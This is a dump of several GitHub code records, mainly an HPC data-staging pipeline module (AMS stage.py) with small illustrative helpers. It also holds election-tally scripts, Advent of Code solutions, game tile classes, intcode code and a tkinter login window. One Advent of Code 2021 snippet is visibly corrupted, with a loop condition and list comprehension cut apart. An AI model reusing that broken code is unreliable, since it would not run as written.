self.o_queue.put(QueueMessage(MessageType.Process, fn))\n            if is_terminate:\n                self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n                break\n\n        end = time.time()\n        print(f\"Spent {end - start} {total_bytes_written} at {self.__class__.__name__}\")\n
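\n\n# --- Editor's illustration (an addition, not part of the original module): the\n# Terminate/Process protocol the tasks above follow. Every stage drains its input\n# queue until the Terminate sentinel arrives, then forwards the sentinel downstream.\ndef _sketch_drain_until_terminate(i_queue, o_queue, process):\n    while True:\n        item = i_queue.get(block=True)  # blocking read, as in FSWriteTask.__call__\n        if item.is_terminate():\n            o_queue.put(QueueMessage(MessageType.Terminate, None))\n            return\n        if item.is_process():\n            o_queue.put(QueueMessage(MessageType.Process, process(item.data())))\n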
\n\nclass PushToStore(Task):\n    \"\"\"\n    PushToStore is the epilogue of the pipeline. Effectively (if instructed to)\n    it informs the kosh store about the existence of a new file.\n\n    Attributes:\n        ams_config: The AMS configuration storing information regarding the AMS setup.\n        i_queue: The queue to read file locations from\n        dir: The directory of the database\n        store: The Kosh Store\n    \"\"\"\n\n    def __init__(self, i_queue, ams_config, db_path, store):\n        \"\"\"\n        Initializes the PushToStore Task. It reads files from i_queue; if the file\n        is not under db_path it copies the file to this location, and if store is defined\n        it makes the kosh-store aware of the existence of the file.\n        \"\"\"\n\n        self.ams_config = ams_config\n        self.i_queue = i_queue\n        self.dir = Path(db_path).absolute()\n        self._store = store\n        if not self.dir.exists():\n            self.dir.mkdir(parents=True, exist_ok=True)\n\n    def __call__(self):\n        \"\"\"\n        A busy loop reading messages from the i_queue and publishing them to the kosh store.\n        \"\"\"\n        start = time.time()\n        if self._store:\n            db_store = AMSDataStore(\n                self.ams_config.db_path, self.ams_config.db_store, self.ams_config.name, False\n            ).open()\n\n        while True:\n            item = self.i_queue.get(block=True)\n            if item.is_terminate():\n                break\n            elif item.is_process():\n                src_fn = Path(item.data())\n                dest_file = self.dir / src_fn.name\n                if src_fn != dest_file:\n                    shutil.move(src_fn, dest_file)\n\n                if self._store:\n                    db_store.add_candidates([str(dest_file)])\n\n        end = time.time()\n        print(f\"Spent {end - start} at {self.__class__.__name__}\")\n
\n\nclass Pipeline(ABC):\n    \"\"\"\n    An interface class representing a sequence of transformations/actions to be performed\n    to store data in the AMS kosh-store. The actions can be performed either sequentially\n    or in parallel using different policies/vehicles (threads or processes).\n\n    Attributes:\n        ams_config: The AMS configuration required when publishing to the AMS store.\n        dest_dir: The final path to store data to.\n        stage_dir: An intermediate location to store files. Useful if the configuration requires\n        storing the data in some scratch directory (SSD) before making it public to the parallel filesystem.\n        actions: A list of actions to be performed before storing the data in the filesystem\n        db_type: The file format of the data to be stored\n        writer: The class to be used to write data to the filesystem.\n    \"\"\"\n\n    supported_policies = {\"sequential\", \"thread\", \"process\"}\n    supported_writers = {\"shdf5\", \"dhdf5\", \"csv\"}\n\n    def __init__(self, db_dir, store, dest_dir=None, stage_dir=None, db_type=\"hdf5\"):\n        \"\"\"\n        Initializes the Pipeline class to write the final data in the 'dest_dir' using a file writer of type 'db_type'\n        and optionally caching the data in the 'stage_dir' before making them available in the cache store.\n        \"\"\"\n        self.ams_config = AMSInstance.from_path(db_dir)\n\n        if dest_dir is not None:\n            self.dest_dir = dest_dir\n\n        if dest_dir is None and store:\n            self.dest_dir = self.ams_config.db_path\n\n        self.stage_dir = self.dest_dir\n\n        if stage_dir is not None:\n            self.stage_dir = stage_dir\n\n        self.actions = list()\n\n        self.db_type = db_type\n\n        self._writer = get_writer(self.db_type)\n\n        self.store = store\n\n    def add_data_action(self, callback):\n        \"\"\"\n        Adds an action to be performed on the data before storing it in the filesystem\n\n        Args:\n            callback: A callback to be called on every input, output.\n        \"\"\"\n        if not callable(callback):\n            raise TypeError(f\"{self.__class__.__name__} requires a callable as an argument\")\n\n        self.actions.append(callback)\n\n    def _seq_execute(self):\n        \"\"\"\n        Executes all tasks sequentially. Every task starts after all incoming messages\n        are processed by the previous task.\n        \"\"\"\n        for t in self._tasks:\n            t()\n\n    def _parallel_execute(self, exec_vehicle_cls):\n        \"\"\"\n        Executes all tasks in parallel using the specified vehicle type\n\n        Args:\n            exec_vehicle_cls: The class to be used to generate entities\n            executing actions by reading data from i/o_queue(s).\n        \"\"\"\n        executors = list()\n        for a in self._tasks:\n            executors.append(exec_vehicle_cls(target=a))\n\n        for e in executors:\n            e.start()\n\n        for e in executors:\n            e.join()\n\n    def _execute_tasks(self, policy):\n        \"\"\"\n        Executes all tasks using the specified policy\n\n        Args:\n            policy: The policy to be used to execute the pipeline\n        \"\"\"\n        executors = {\"thread\": Thread, \"process\": Process}\n\n        if policy == \"sequential\":\n            self._seq_execute()\n            return\n\n        self._parallel_execute(executors[policy])\n        return\n\n    def _link_pipeline(self, policy):\n        \"\"\"\n        Links all actions/stages of the pipeline with input/output queues.\n\n        Args:\n            policy: The policy to be used to execute the pipeline\n        \"\"\"\n        _qType = self.get_q_type(policy)\n        # We need 1 queue to copy incoming data to the pipeline.\n        # Every action requires 1 input and one output q, but the output\n        # q is used as an input q of the next action, thus we need num actions - 1.\n        # 2 extra queues to store to the data-store and publish on kosh.\n        num_queues = 1 + len(self.actions) - 1 + 2\n        self._queues = [_qType() for i in range(num_queues)]\n\n        self._tasks = [self.get_load_task(self._queues[0])]\n        for i, a in enumerate(self.actions):\n            self._tasks.append(ForwardTask(self._queues[i], self._queues[i + 1], a))\n\n        # After user actions we store into a file\n        self._tasks.append(FSWriteTask(self._queues[-2], self._queues[-1], self._writer, self.stage_dir))\n        # After storing the file we make it public to the kosh store.\n        self._tasks.append(PushToStore(self._queues[-1], self.ams_config, self.dest_dir, self.store))\n\n    def execute(self, policy):\n        \"\"\"\n        Execute the pipeline of tasks using the specified policy (blocking).\n\n        Args:\n            policy: The policy to be used to execute the pipeline\n        \"\"\"\n        if policy not in self.__class__.supported_policies:\n            raise RuntimeError(\n                f\"Pipeline execute does not support policy: {policy}, please select from {Pipeline.supported_policies}\"\n            )\n\n        # Create a pipeline of actions and link them with appropriate queues\n        self._link_pipeline(policy)\n        # Execute them\n        self._execute_tasks(policy)\n\n    @abstractmethod\n    def get_load_task(self, o_queue):\n        \"\"\"\n        Callback to the child class to return the task that loads data from some unspecified entry-point.\n        \"\"\"\n        pass\n\n    @staticmethod\n    @abstractmethod\n    def add_cli_args(parser):\n        \"\"\"\n        Initialize root pipeline class cli parser with the options.\n        \"\"\"\n        parser.add_argument(\"--dest\", \"-d\", dest=\"dest_dir\", help=\"Where to store the data (Directory should exist)\")\n        parser.add_argument(\n            \"--stage-dir\",\n            dest=\"stage_dir\",\n            help=\"Where to 'stage' data (some directory either under /dev/shm/ or under local storage (SSD))\",\n            default=None,\n        )\n        parser.add_argument(\n            \"--db-type\",\n            dest=\"db_type\",\n            choices=Pipeline.supported_writers,\n            help=\"File format to store the data to\",\n            default=\"dhdf5\",\n        )\n        # parser.add_argument(\"--db-dir\", \"-d\", help=\"path to the AMS store directory\", required=True)\n        parser.add_argument(\"--persistent-db-path\", \"-db\", help=\"The path of the AMS database\", required=True)\n        parser.add_argument(\"--store\", dest=\"store\", action=\"store_true\")\n        parser.add_argument(\"--no-store\", dest=\"store\", action=\"store_false\")\n        parser.set_defaults(store=True)\n        return\n\n    @abstractclassmethod\n    def from_cli(cls):\n        pass\n\n    @staticmethod\n    def get_q_type(policy):\n        \"\"\"\n        Returns the type of the queue to be used to create Queues for the specified policy.\n        \"\"\"\n\n        p_to_type = {\"sequential\": ser_queue, \"thread\": ser_queue, \"process\": mp_queue}\n        return p_to_type[policy]\n
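\n\n# --- Editor's illustration (an addition, not part of the original module): the queue\n# arithmetic from _link_pipeline above. N user actions share N - 1 inner queues, plus\n# one input queue and two trailing queues for the writer and the store stages.\ndef _sketch_queue_count(num_actions):\n    num_queues = 1 + num_actions - 1 + 2\n    assert num_queues == num_actions + 2\n    return num_queues\n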
\n\nclass FSPipeline(Pipeline):\n    \"\"\"\n    A 'Pipeline' reading data from the filesystem and storing them back to the filesystem.\n\n    Attributes:\n        src: The source directory to read data from.\n        pattern: The pattern to glob files from.\n        src_type: The file format of the source data\n    \"\"\"\n\n    supported_readers = (\"shdf5\", \"dhdf5\", \"csv\")\n\n    def __init__(self, db_dir, store, dest_dir, stage_dir, db_type, src, src_type, pattern):\n        \"\"\"\n        Initialize a FSPipeline that will write data to the 'dest_dir' and optionally publish\n        these files to the kosh-store 'store' by using the stage_dir as an intermediate directory.\n        \"\"\"\n        super().__init__(db_dir, store, dest_dir, stage_dir, db_type)\n        self._src = Path(src)\n        self._pattern = pattern\n        self._src_type = src_type\n\n    def get_load_task(self, o_queue):\n        \"\"\"\n        Return a Task that loads data from the filesystem\n\n        Args:\n            o_queue: The queue the load task will push read data to.\n\n        Returns: An FSLoaderTask instance reading data from the filesystem and forwarding the values to the o_queue.\n        \"\"\"\n        loader = get_reader(self._src_type)\n        return FSLoaderTask(o_queue, loader, pattern=str(self._src) + \"/\" + self._pattern)\n\n    @staticmethod\n    def add_cli_args(parser):\n        \"\"\"\n        Add cli arguments to the parser required by this Pipeline.\n        \"\"\"\n        Pipeline.add_cli_args(parser)\n        parser.add_argument(\"--src\", \"-s\", help=\"Where to copy the data from\", required=True)\n        parser.add_argument(\"--src-type\", \"-st\", choices=FSPipeline.supported_readers, default=\"shdf5\")\n        parser.add_argument(\"--pattern\", \"-p\", help=\"Glob pattern to read data from\", required=True)\n        return\n\n    @classmethod\n    def from_cli(cls, args):\n        \"\"\"\n        Create FSPipeline from the user provided CLI.\n        \"\"\"\n        return cls(\n            args.persistent_db_path,\n            args.store,\n            args.dest_dir,\n            args.stage_dir,\n            args.db_type,\n            args.src,\n            args.src_type,\n            args.pattern,\n        )\n\n\nclass RMQPipeline(Pipeline):\n    \"\"\"\n    A 'Pipeline' reading data from RabbitMQ and storing them back to the filesystem.\n\n    Attributes:\n        credentials: The JSON credentials to connect to the RMQ server\n        cacert: The TLS certificate\n        rmq_queue: The RMQ queue to listen to.\n    \"\"\"\n\n    def __init__(self, db_dir, store, dest_dir, stage_dir, db_type, credentials, cacert, rmq_queue):\n        \"\"\"\n        Initialize a RMQPipeline that will write data to the 'dest_dir' and optionally publish\n        these files to the kosh-store 'store' by using the stage_dir as an intermediate directory.\n        \"\"\"\n        super().__init__(db_dir, store, dest_dir, stage_dir, db_type)\n        self._credentials = Path(credentials)\n        self._cacert = Path(cacert)\n        self._rmq_queue = rmq_queue\n\n    def get_load_task(self, o_queue):\n        \"\"\"\n        Return a Task that loads data from RabbitMQ\n\n        Args:\n            o_queue: The queue the load task will push read data to.\n\n        Returns: An RMQLoaderTask instance reading data from RabbitMQ and forwarding the values to the o_queue.\n        \"\"\"\n        return RMQLoaderTask(o_queue, self._credentials, self._cacert, self._rmq_queue)\n\n    @staticmethod\n    def add_cli_args(parser):\n        \"\"\"\n        Add cli arguments to the parser required by this Pipeline.\n        \"\"\"\n        Pipeline.add_cli_args(parser)\n        parser.add_argument(\"-c\", \"--creds\", help=\"Credentials file (JSON)\", required=True)\n        parser.add_argument(\"-t\", \"--cert\", help=\"TLS certificate file\", required=True)\n        parser.add_argument(\"-q\", \"--queue\", help=\"On which queue to receive messages\", required=True)\n        return\n\n    @classmethod\n    def from_cli(cls, args):\n        \"\"\"\n        Create RMQPipeline from the user provided CLI.\n        \"\"\"\n        print(\"Creating database from here\", args.persistent_db_path)\n        return cls(\n            args.persistent_db_path,\n            args.store,\n            args.dest_dir,\n            args.stage_dir,\n            args.db_type,\n            args.creds,\n            args.cert,\n            args.queue,\n        )\n\n\ndef get_pipeline(src_mechanism=\"fs\"):\n    \"\"\"\n    Factory method to return the pipeline mechanism for the given source entry point\n\n    Args:\n        src_mechanism: The entry mechanism to read data from.\n\n    Returns: A Pipeline class to start the stage AMS service\n    \"\"\"\n    PipeMechanisms = {\"fs\": FSPipeline, \"network\": RMQPipeline}\n    if src_mechanism not in PipeMechanisms.keys():\n        raise RuntimeError(f\"Pipeline {src_mechanism} storing mechanism does not exist\")\n\n    return 
PipeMechanisms[src_mechanism]\n","repo_name":"LLNL/AMS","sub_path":"src/AMSWorkflow/ams/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":30779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7300209467","text":"import os\r\nimport csv\r\n\r\nelection_csv = os.path.join(r\"C:\\Users\\aajanaku\\OneDrive - Above the Treeline, Inc\\Desktop\\Resource\", \"election_data.csv\")\r\noutput_file = \"election_results.txt\"\r\n\r\ncandidate_counts = {}\r\nballot_counts = {}\r\n\r\n# Open and read csv\r\nwith open(election_csv) as csv_file:\r\n reader = csv.reader(csv_file, delimiter=\",\")\r\n\r\n csv_header = next(reader)\r\n\r\n for row in reader:\r\n candidate = row[2]\r\n if candidate in candidate_counts:\r\n candidate_counts[candidate] += 1\r\n else:\r\n candidate_counts[candidate] = 1\r\n\r\n # Count the unique ballots using a dictionary\r\n ballot_id = row[0]\r\n if ballot_id in ballot_counts:\r\n ballot_counts[ballot_id] += 1\r\n else:\r\n ballot_counts[ballot_id] = 1\r\n\r\n# Calculate total ballot count\r\ntotal_ballots = len(ballot_counts)\r\n\r\n# Open the output file in write mode\r\nwith open(output_file, \"w\") as f:\r\n # Write the total ballot count\r\n f.write(f\"Total Votes: {total_ballots}\\n\")\r\n\r\n # Write vote counts and percentages for each candidate\r\n for candidate, count in candidate_counts.items():\r\n percentage = (count / total_ballots) * 100\r\n f.write(f\"{candidate}: {count} ({percentage:.2f}%)\\n\")\r\n\r\n # Determine and write the winner\r\n winner = max(candidate_counts, key=candidate_counts.get)\r\n f.write(f\"Winner: {winner}\\n\")\r\n\r\n# Print a message indicating the results were written to the file\r\nprint(\"Election results written to the file:\", output_file)\r\n","repo_name":"aajanaku/python-challenge","sub_path":"Pypoll/Pypoll.py","file_name":"Pypoll.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30709054732","text":"# Import libaries\nimport pandas as pd\n\n# Print what I'm doing\nprint('Election Results')\nprint('--------------------')\n\n# Read data\ndata = 'election_data_1.csv'\ndata_df = pd.read_csv(data)\n\ndata_df.head()\n\n# Print total votes\ntotal_votes = data_df['Voter ID'].count()\n\nprint('Total Votes: ' + str(total_votes))\nprint('--------------------')\n\n# Votes/ candidate\ncandidates = data_df.groupby('Candidate')\ncandidates\n\ncandidate_votes = candidates['Voter ID'].count()\ncandidate_votes\n\n# Percent votes/ candidate\npercent_votes = round((candidate_votes/ total_votes)*100,1)\npercent_votes\n\n# New results data frame\nresults_df = pd.concat([candidate_votes, percent_votes], axis=1)\nresults_df.columns = ['Votes', 'Percent']\nprint(results_df[['Percent', 'Votes']])\n\n# Print winner\nprint('--------------------')\nwinner = results_df['Percent'].sort_values(ascending=False)\nprint('Winner: {}'.format(winner.index[0]))\nprint('--------------------')\n\n# Export results into .txt\n# 'main.py' > 'main.txt'\nf= open(\"main.txt\",\"w\")\nf.write('Election Results\\n')\nf.write('--------------------\\n')\nf.write('Total Votes: ' + str(total_votes))\nf.write('\\n--------------------\\n')\nf.write(' '+str(results_df[['Percent', 'Votes']]))\nf.write('\\n--------------------')\nf.write('\\nWinner: {}'.format(winner.index[0]))\nf.write('\\n--------------------') \nf.close() 
\n\n\n","repo_name":"nasavish/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26485378124","text":"\"\"\"Advent of code Day 4 part 1 and 2\"\"\"\n\nfrom __future__ import annotations\n\nimport re\nfrom datetime import datetime, time, timedelta\nfrom operator import itemgetter\n\n\nclass Guard:\n \"\"\"A guard who has a record of shifts\"\"\"\n\n def __init__(self, guard_id: int) -> None:\n \"\"\"Creates a Guard\"\"\"\n self.id: int = guard_id\n self.shift_record: list[Shift] = []\n\n def __repr__(self) -> str:\n return 'Guard(' + str(self.id) + ')'\n\n def __gt__(self, other):\n return self.calculate_minutes_asleep() > other.calculate_minutes_asleep()\n\n @property\n def awake_time(self) -> list[int]:\n \"\"\"A list with count of times awake\"\"\"\n awake_time = [0 for _ in range(60)]\n for i in range(60):\n for shift in self.shift_record:\n awake_time[i] += shift.awake_schedule[i]\n return awake_time\n\n @property\n def asleep_time(self) -> list[int]:\n \"\"\"A list with count of times asleep\"\"\"\n awake_time = self.awake_time\n return [len(self.shift_record) - awake_time[i] for i in range(60)]\n\n @property\n def most_sleepy_minute(self) -> int:\n \"\"\"Returns most sleepy time\"\"\"\n return min(enumerate(self.awake_time), key=itemgetter(1))[0]\n\n def add_shift(self, shift: Shift) -> None:\n \"\"\"Adds a shift to the shift record\"\"\"\n self.shift_record.append(shift)\n\n def calculate_minutes_asleep(self) -> int:\n \"\"\"Calculate the total minutes asleep\"\"\"\n return sum(shift.get_minutes_asleep() for shift in self.shift_record)\n\n\nclass Shift:\n \"\"\"A work shift\"\"\"\n\n def __init__(self, lines: list[tuple[datetime, str]]) -> None:\n \"\"\"Creates the Shift object\"\"\"\n # If empty list, they were awake the whole time\n if not lines:\n self.time_awake = timedelta(minutes=60)\n self.time_asleep = timedelta(minutes=0)\n self.awake_schedule = [1 for _ in range(60)]\n return\n\n self.time_awake = timedelta()\n self.time_asleep = timedelta()\n self.awake_schedule = [1 for _ in range(60)]\n\n last_time = datetime.combine(lines[0][0].date(), time(0))\n\n is_awake = True\n\n for line in lines:\n current_time = line[0]\n\n if is_awake:\n self.time_awake += current_time - last_time\n is_awake = False\n else:\n self.time_asleep += current_time - last_time\n for i in range(last_time.minute, current_time.minute):\n self.awake_schedule[i] -= 1\n is_awake = True\n last_time = current_time\n\n def __repr__(self) -> str:\n return 'Shift(' + str(self.time_awake) + ')'\n\n def get_minutes_asleep(self) -> int:\n \"\"\"Gets the total minutes asleep on the shift\"\"\"\n return self.time_asleep.seconds // 60\n\n\ndef main():\n \"\"\"Main function\"\"\"\n with open('input.txt', encoding='utf-8') as file:\n lines = [(datetime.fromisoformat(date_time), desc)\n for date_time, desc in re.findall(r'\\[(.+)\\] (.+)',\n file.read())]\n\n lines: list[tuple[datetime, str]] = sorted(lines, key=itemgetter(0))\n\n guard_ids = [int(x) for x in re.findall(r'#(\\d+)', ''.join(str(lines)))]\n guards: dict[Guard] = {}\n\n for guard_id in sorted(set(guard_ids)):\n guards[guard_id] = Guard(guard_id)\n\n shift_starts = [i for i, line in enumerate(\n lines) if line[1].startswith('Guard')]\n\n for i, shift_start in enumerate(shift_starts):\n guard_id = int(lines[shift_start][1].split()[1][1:])\n\n if shift_start == shift_starts[-1]:\n 
guards[guard_id].add_shift(Shift(lines[shift_start+1:]))\n else:\n guards[guard_id].add_shift(\n Shift(lines[shift_start+1:shift_starts[i+1]]))\n\n most_sleepy_guard = max(guards.values())\n\n print('Part 1')\n print(most_sleepy_guard.most_sleepy_minute * most_sleepy_guard.id)\n\n guard_id, time_asleep = max(\n ((key, max(item.asleep_time)) for key, item in guards.items()),\n key=itemgetter(1))\n\n print('\\nPart 2')\n print(guard_id * guards[guard_id].asleep_time.index(time_asleep))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michaelotty/aoc2018","sub_path":"04/aoc201804.py","file_name":"aoc201804.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37720077153","text":"import rabbyt\nimport pyglet\nimport resources\n\nclass Tile(rabbyt.sprites.Sprite):\n\n def __init__(self, text, texture,*args, **kwargs):\n super(Tile, self).__init__(*args, **kwargs)\n self.text = text\n self.texture = texture\n\nclass Button(Tile):\n\n def __init__(self, text, texture, *args, **kwargs):\n self.clicked = False\n super(Button, self).__init__(text=text, texture=texture, *args, **kwargs)\n self.labels = [pyglet.text.Label(self.text, font_name='Ariel', font_size=12, \n x=self.x, y=self.y, anchor_x='center', anchor_y='center')]\n\n def on_click(self, menu, player, x, y):\n if (x > (self.x - (self.texture.width / 2)) and x < (self.x + (self.texture.width / 2))):\n if (y > (self.y - (self.texture.height / 2)) and y < (self.y + (self.texture.height / 2))):\n self.clicked = not self.clicked\n if self.clicked:\n menu.trigger.perform_action(player, self.labels[0].text)\n else:\n self.clicked = False\n else:\n self.clicked = False\n\nclass InventoryTile(Tile):\n\n def __init__(self, text, texture, *args, **kwargs):\n super(InventoryTile, self).__init__(text=text, texture=texture, *args, **kwargs)\n\n self.y_count = self.y - self.texture.height/6\n self.y_weight = self.y - self.texture.height/6\n self.y_description = self.y + self.texture.height/6\n\n self.label_description = pyglet.text.Label(text=str(self.text[0]), font_name='Ariel', font_size=12, \n x=self.x, y=self.y_description, anchor_x='center', anchor_y='center')\n self.label_stats = pyglet.text.Label(text=\"Count: \" + str(self.text[1]) + \" Weight: \" + str(self.text[2]), font_name='Ariel', font_size=12, \n x=self.x, y=self.y_count, anchor_x='center', anchor_y='center',width=self.texture.width)\n\n self.labels = [self.label_description, self.label_stats]\n\n def update(self, text):\n self.label_description.text = str(text[0])\n self.label_stats.text = \"Count: \" + str(text[1]) + \" Weight: \" + str(text[2])\n self.labels = [self.label_description, self.label_stats]\n\nclass WeaponTile(Tile):\n\n def __init__(self, *args, **kwargs):\n super(WeaponTile, self).__init__(*args, **kwargs)\n self.viewable = False\n self.spacing = 25\n self.nameY = self.y + 80 - self.spacing\n self.damY = self.y + 80 - self.spacing*2\n self.rangeY = self.y + 80 - self.spacing*4\n self.rofY = self.y + 80 - self.spacing*3\n\n\n self.label_name = pyglet.text.Label(str(self.text[0]), font_name='Press Start 2P', font_size=12, \n x=self.x - self.spacing*5, y=self.nameY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_dam = pyglet.text.Label(\"Damage: \" + str(round(float(self.text[1]))), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.damY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_range = 
pyglet.text.Label(\"Range: \" + str(round(float(self.text[2]))), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.rangeY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_rof = pyglet.text.Label(\"Rate of Fire: \" + str(round(float(self.text[3]), 2)), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.rofY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n\n def render(self):\n super(WeaponTile, self).render()\n self.label_name.draw()\n self.label_dam.draw()\n self.label_range.draw()\n self.label_rof.draw()\n\nclass WeaponBox(object):\n\n def __init__(self, weapon, x=1450, y=750):\n self.spacing = 0\n self.x = x\n self.y = y\n self.weapon = weapon\n self.texture = resources.weaponBoxImage\n self.background = rabbyt.sprites.Sprite(texture=self.texture, x=self.x, y=self.y)\n if self.weapon:\n self.weapon.x = self.x+self.spacing\n self.weapon.y = self.y-self.spacing\n\n def render(self):\n self.background.render()\n if self.weapon:\n self.weapon.render()\n","repo_name":"segerphilip/sofdesfinal","sub_path":"Classes/Tiles.py","file_name":"Tiles.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71683646247","text":"from itertools import permutations\n\nfrom intcode import run, input_to_codes\nfrom util import read_input\n\n\ndef get_digits(i):\n return [int(x) for x in str(i)]\n\n\ndef get_signals(signal_range: range):\n return list(permutations(signal_range))\n\n\ndef list_to_int(lst: list) -> int:\n return int(''.join(lst))\n\n\ndef get_thruster_signal(inst, phase, copy_sequence=True):\n p = iter(phase)\n c = next(p), 0\n thrust = 0\n for i in range(5):\n seq = copy_sequence and list(inst) or inst\n thrust = run(seq, iter(c))\n try:\n c = next(p), thrust\n except StopIteration:\n pass\n return thrust\n\n\ndef get_thruster_signal_feedback(inst, phase):\n amps = [list(inst) for _ in range(5)]\n thrust = 0\n for amp in amps:\n thrust = get_thruster_signal(amp, phase, copy_sequence=False)\n for amp in amps:\n thrust = run(amp, thrust)\n return thrust\n\n\ndef get_max_thruster_signal(sequence: list, signal_range: range) -> int:\n signals = get_signals(signal_range)\n max_signal = 0\n for phase in signals:\n signal = get_thruster_signal(list(sequence), phase)\n max_signal = signal > max_signal and signal or max_signal\n return max_signal\n\n\ndef run_signal_to_halt(sequence: list, signal_range: range) -> int:\n signals = get_signals(signal_range)\n max_signal = 0\n for phase in signals:\n signal = get_thruster_signal_feedback(sequence, phase)\n max_signal = signal > max_signal and signal or max_signal\n return max_signal\n\n\ndef part_one(inst):\n print(get_max_thruster_signal(list(inst), signal_range=range(5)))\n\n\ndef part_two(inst):\n print(run_signal_to_halt(list(inst), signal_range=range(5, 10)))\n\n\nif __name__ == '__main__':\n instructions = input_to_codes(read_input('input.txt'))\n part_one(instructions)\n part_two(instructions)\n","repo_name":"andyhoneycutt/advent-of-code","sub_path":"python/2019/day07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20120647242","text":"import sys\n\nsys.path.append(\"../ariadna\")\nimport tkinter as tk\nfrom vista.ventana_base import VentanaBase\nimport settings as ck\n\n\nclass VentanaLogin(tk.Tk, VentanaBase):\n USUARIOS = 
ck.USUARIOS\n\n    def __init__(self, version):\n        super().__init__()\n        self.version = version\n\n        self.ancho = 300\n        self.alto = 120\n        self.geometry(self.centrar_ventana(self, self.ancho, self.alto))\n\n        self.title(\"Login\")\n        self.configure(bg=self.color_back)\n\n        # Create labels and entry fields for the username and password\n        self.etiqueta_usuario = tk.Label(\n            self, text=\"Usuario:\", background=self.color_back, fg=\"white\"\n        )\n        self.etiqueta_usuario.pack()\n        self.user = tk.StringVar()\n        self.user.set(\"\")\n        self.entry_usuario = tk.Entry(self, textvariable=self.user)\n        self.entry_usuario.pack()\n\n        self.etiqueta_contrasena = tk.Label(\n            self, text=\"Contraseña:\", background=self.color_back, fg=\"white\"\n        )\n        self.etiqueta_contrasena.pack()\n        self.entry_contrasena = tk.Entry(self, show=\"*\")  # Hide the password\n        self.entry_contrasena.pack()\n\n        # Login button\n        self.boton_login = tk.Button(\n            self, text=\"Ingresar\", command=lambda: self.verificar()\n        )\n        self.boton_login.pack()\n        self.entry_usuario.bind(\"<Return>\", lambda event: self.verificar())\n        self.entry_contrasena.bind(\"<Return>\", lambda event: self.verificar())\n        self.mainloop()\n\n    def verificar(self):\n        usuario = self.entry_usuario.get()\n        contrasena = self.entry_contrasena.get()\n\n        # Check whether the username and password are valid (simple example)\n        if usuario in self.USUARIOS and contrasena == self.USUARIOS[usuario]:\n            self.destroy()  # Destroy the login window\n            self.abrir_ventana_principal(usuario)  # Open the main GUI\n        else:\n            self.mostrar_mensaje_advertencia(\"Usuario o contraseña inválidos\")\n\n    def abrir_ventana_principal(self, usuario):\n        from controladores.controlador_GUI import Aplicacion\n\n        app = Aplicacion(self.version, usuario)\n","repo_name":"simon1494/Ariadna","sub_path":"vista/ventana_login.py","file_name":"ventana_login.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36133905202","text":"import aocd\r\nimport numpy as np\r\ns= aocd.get_data(day=9,year=2021).splitlines()\r\ns = np.array([[int(c) for c in b] for b in s])\r\n\r\ndef neighbor(y,x,without=False):\r\n    a = []\r\n    for q,e in [(y+1,x),(y-1,x),(y,x-1),(y,x+1)]:\r\n        if 0<=q0],return_counts=1)\r\nh.sort()\r\nprint(np.prod(h[-3:]))","repo_name":"MockaWolke/Advent_of_Code_2021","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17971735303","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.13.0)\n#\n# WARNING! 
